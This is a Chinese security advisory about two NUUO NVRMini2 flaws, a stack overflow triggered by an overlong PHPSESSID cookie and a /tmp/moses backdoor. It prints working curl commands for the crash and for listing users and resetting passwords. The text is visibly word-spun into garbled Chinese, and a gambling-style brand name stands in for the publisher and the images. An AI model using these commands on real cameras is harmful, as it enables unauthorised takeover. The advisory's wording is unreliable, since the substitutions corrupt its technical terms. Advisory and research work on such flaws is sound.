NUUO摄像头系统NVRMini2多个误差威胁预警通告

2018-09-18

宣布者：九游老哥科技

综述

北京时间2018年9月18日，Tenable官网上果真了关于由NUUO公司开发的摄像头系统NVRMini2保存多个严重误差，危害信息如下：

项目	形貌
CVE ID	CVE-2018-1149 CVE-2018-1150
Nessus插件ID	117427
CVSSv2基准/时间分数	10.0 / 8.3
CVSSv2向量	AV：N / AC：L / Au：N / C：C / I：C / A：C
受影响的产品	NUUO NVRMini2 3.8.0及以下版本
危害因素	严重

https://www.tenable.com/security/research/tra-2018-25

攻击演示视频如下：

http://www.iqiyi.com/w_19s2b6hn11.html

NVRMini2的结构简图如下

九游老哥·(中国)俱乐部官方网站

误差概述

CVE-2018-1149：未经身份验证的远程客栈缓冲区溢出

NVRMini2系统对外袒露了一个HTTP会见接口http:///cgi-bin/cgi_system，通过这个接口，具有权限的用户可以会见到终端装备。cgi_system文件中的功效只有授权用户可以会见，认证的要领为较量用户会见数据Cookie字段中的PHPSESSID值和存储/tmp目录中的session文件名，构建session文件名的代码如下：

九游老哥·(中国)俱乐部官方网站

从sub_534a4返回的值为会话标识字符串。程序对该字符串长度没有作任何限制。当字符勾转达到sprintf以构建tmp文件名时并没有界线检查。因此，未经身份验证的攻击者可以将超长的PHPSESSID值远程转达给sprintf导致缓冲区溢出，从而远程执行代码。

测试代码如下：

curl -v --cookie "PHPSESSID=982e6c010064b3878a4b793bfab8d2d2aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;" "http://XXXXXXXXXXXX/cgi-bin/cgi_system?cmd=portCheck"

测试代码会导致NVR系统会爆发瓦解征象，经由深入剖析，也可以远程执行代码，攻击者不但能够控制NVR，还可以会见和修改NVR中所有的用户凭证数据，影响严重。

CVE-2018-1150：后门

NVRMini2的PHP代码中常见的习惯为：

1. 检查目今PHP会话是否有用。

2. 验证会话是否具有正在会见的页面的适当权限（即admin，poweruser，user，root，guest）。

可是，check_session_is_valid（）函数中却保存后门的代码，函数如下：

if (file_exists(constant("MOSES_FILE"))) //back door

     update_session();

     return 0;

其中标识为“back door”的字样为其源码中就保存的。constant("MOSES_FILE")指向的路径为/tmp/moses。若是/tmp/moses/保存，则未授权的攻击者可以远程列出所有非admin的用户，并修改他们的密码.

albinolobster@ubuntu:~$ curl http://xxxxxxxxxxx/users_xml.php

<AccountInfo>

<users>

<userinfo><no>1</no><username>testuser</username><group>poweruser</group><displaygroup>power user</displaygroup><live>12345678</live><playback>12345678</playback><ptz>1</ptz><io>1</io><backupdata>1</backupdata><deletedata>1</deletedata><emapsetting>1</emapsetting><remotalksetting>1

</remotalksetting><log>0</log></userinfo>

</users>

<groups>

<groupinfo><no>1</no><groupname>poweruser</groupname><displayname>power user</displayname><groupmembers>testuser</groupmembers></groupinfo><groupinfo><no>2</no><groupname>user</groupname><displayname>user</displayname><groupmembers></groupmembers></groupinfo><groupinfo><no>3</no><groupname>guestuser</groupname><displayname>guestuser</displayname><groupmembers></groupmembers></groupinfo></groups>

</AccountInfo>

test@ubuntu:~$ curl 'http://xxxxxxxxx /users_xml.php?cmd=changepwd&username=testuser&newpwd=pwned'

change password: testuser ok!

解决计划

官方计划

官方暂时没有相关的计划，建议包管装备不袒露在互联网上，并在防火墙装备上加入对摄像头HTTP服务的会见控制战略。

九游老哥科技计划

检测计划

1. 使用九游老哥科技Web应用误差扫描系统、九游老哥科技九游老哥远程清静评估系统发明内网保存问题的装备。

2. 使用九游老哥科技网络入侵检测系统发明网络中保存的攻击特征。

防护计划

使用九游老哥科技WEB应用防护系统、九游老哥科技NF防火墙系统、九游老哥科技网络入侵防护系统举行装备隔离或者攻击阻断。

声明

本清静通告仅用来形貌可能保存的清静问题，九游老哥科技不为此清静通告提供任何包管或允许。由于撒播、使用此清静通告所提供的信息而造成的任何直接或者间接的效果及损失，均由使用者自己认真，九游老哥科技以及清静通告作者不为此肩负任何责任。九游老哥科技拥有对此清静通告的修改息争释权。如欲转载或撒播此清静通告，必需包管此清静通告的完整性，包括版权声明等所有内容。未经九游老哥科技允许，不得恣意修改或者增减此清静通告内容，不得以任何方法将其用于商业目的。